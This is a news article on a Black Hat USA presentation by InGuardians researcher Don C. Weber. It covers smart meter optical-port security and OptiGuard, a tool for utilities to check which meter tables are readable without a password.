      LAS VEGAS - BLACK HAT USA - Six months after calling off his talk at another security conference, researcher Don C. Weber stepped in front of an audience at the Black Hat conference in Las Vegas. His subject: smart meter security, and how the devices on the sides of homes across America could be potentially vulnerable to attack.

      "What we're happening these people understand…where they can improve - help them identify risk and help them prioritize that so they can address these issues in a cost-effective [fashion]," Weber said during remarks to the media after his presentation.

      Six months ago, Weber, who works for the security consultancy InGuardians, was set to discuss smart meter security in front of an audience of attendees at the ShmooCon security conference in Washington, D.C. He pulled the talk at the request of a vendor. Today, he discussed a tool he created known as OptiGuard, which he said is designed to help utilities assess the optical port on their smart meters.

      The optical ports are used by field technicians working for utility companies to pull configuration data from the meter, or to configure it. By attacking the optical port, an attacker could potentially access it and obtain free energy, commit corporate espionage tied to energy-usage levels or commit other acts, he said.

      "These are publicly facing devices," he said. "They can't have somebody standing at every single meter to make sure you don’t mess with it. They can't have a camera at every single meter."

      SecureState, another critical infrastructure consultancy, released a similar tool last week. While SecureState released the tool publicly, InGuardians opted to only make their tool available to utilities and the researchers that work with them. OptiGuard is a tool that supports the ANSI C12.18 communication protocol, and enables users to potentially run procedures and read and write to tables.

      "One of the things that came out of this testing is that… not every single meter manufacturer protects every table," Weber explained during his presentation. "There might be some configuration data that they think doesn’t necessarily need to be protected by a security password…What our tool is doing is it's providing the utilities with the capability to look to see on these meters what information can I pull off without a security code. And then they can turn back around to the third-party service provider or to the meter vendor, and say, hey, why aren't we protecting this?"

      Weber said that there are a number of security mechanisms companies can pursue to protect smart meters, ranging from tamper alarms to toggling the optical port and secure storage of information on the meter.

      Though he was reluctant to give the smart grid a grade in terms of safety, citing the number of factors involved – from the products being used to implementation – he told members of the media that he was confident that companies are doing their best to implement the technology securely.

      "Nobody likes you to tell them that their baby's ugly," he said. "We might say that your baby's ugly but we’re also showing you that when your baby grows up, if it grows up properly… and you do the proper things, then it will be a beautiful baby, it will be a beautiful adolescent and an adult."

      Source